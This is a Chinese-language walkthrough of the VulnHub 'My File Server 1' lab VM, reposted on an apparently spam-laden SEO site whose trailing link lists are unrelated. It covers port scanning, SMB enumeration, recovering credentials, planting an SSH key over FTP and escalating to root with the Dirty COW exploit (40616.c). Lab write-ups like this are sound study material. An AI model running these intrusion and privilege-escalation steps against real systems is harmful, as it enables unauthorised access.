当前位置: 首页 > news >正文

山东网站制作团队温州seo团队

山东网站制作团队,温州seo团队,马可波罗网介绍,佛山专业做网站公司有哪些下载地址 https://download.vulnhub.com/myfileserver/My_file_server_1.ova 首先我们需要发现ip 我的kali是59.162所以167就是靶机的 然后我们拿nmap扫一下端口 nmap -sV -p- 192.168.59.167 扫完发现有七个端口开放 按照习惯先看80 没看到有啥有用信息,用nikto扫一下 nik…

下载地址

 https://download.vulnhub.com/myfileserver/My_file_server_1.ova

首先我们需要发现ip

我的kali是59.162所以167就是靶机的

然后我们拿nmap扫一下端口

nmap -sV -p- 192.168.59.167

扫完发现有七个端口开放 按照习惯先看80

没看到有啥有用信息,用nikto扫一下

nikto -h 192.168.59.167

发现了一个readme.txt

访问后发现了一个密码

但是不知道密码是哪个服务的 尝试一下ftp匿名登陆

连接上了也没有什么可以利用的信息

ssh连接显示没有权限(就不展示了)

尝试使用smbmap进行枚举 发现smbdate有读写权限

使用smbclient //192.168.59.167/smbdata     连接共享目录,只有smbdata可以匿名访问

下载secure和sshd_config

下载完退出smb(exit),然后cat查看这两个文件发现发现用户smbuser,密码chauthtok

现在已经有了用户名smbuser,而且一开始网页给了密码rootroot1。那么再尝试一下用ftp登录(不知道为啥密码不能用chauthtok)登录成功

进行ssh免密操作,然后上传到靶机 在进行ssh登入 登入成功

ssh-keygen -t rsa #生成公钥私钥文件

改成之前sshd_config文件里要求的名称。重新连接ftp,创建.ssh文件夹,上传文件,退出,ssh -i登录。

ssh -i test smbuser@192.168.59.167

下一步就是提权

这里发现内核版本较低,可以尝试使用脏牛提权

先搜索漏洞库

searchsploit dirty

下载到本地

searchsploit -m 40616.c

使用FPT上传脏牛文件到服务器 然后gcc编译提权

put /root/40616.c /tmp/dirty.c

重新ssh去到tmp下

gcc -pthread dirty.c -o dirty -lcrypt

执行./dirty 123456

可以看到权限已经获取到

成功获取flag

http://www.zhongyajixie.com/news/43074.html

相关文章:

  • 北京 企业网站开发黄页推广引流网站
  • 网站开发 视频存储网站软件推荐
  • 设计师网站上海千锋教育官方网
  • 网站建设常用代码黄山seo排名优化技术
  • 西安知名网站建设网站建设的六个步骤
  • 有个网站是做视频相册的阿里巴巴指数查询
  • 如何零基础做网站chrome浏览器
  • 医疗器械类网站icp备案前置审批信息流广告公司一级代理
  • 无代码开发汕头seo托管
  • 做神马网站优化排大型的营销型网站
  • wordpress 修改为中文seo值怎么提高
  • 不用编程做网站宁波seo公司哪家好
  • 给个龙做罗拉的网站线上营销推广方式
  • Cocos做网站微营销推广软件
  • 论坛网站怎么做大数据下的精准营销
  • 企业网站建设验收最好用的免费建站
  • 中文网站模板下载seo编辑招聘
  • 仿帝国网站源码优化是什么梗
  • 东莞做网站 信科网络什么是网站外链
  • 政府网站方案建站教程
  • ag亚游平台网站开发友情链接交换软件
  • 邦拓网站建设seo 网站优化推广排名教程
  • 手机版做网站河南网站顾问
  • 怀远做网站电话指数是指什么
  • 自己怎么做网站建设新手小白怎么学做运营
  • 网站中怎么做网站统计简单的网页设计源代码
  • 做网站怎样让字体滚动seo课程培训要多少钱
  • 快车app官方下载seo关键词是什么
  • 甜点网站建设的功能及意义非企户百度推广
  • vivo官网网站服务中心新闻式软文经典案例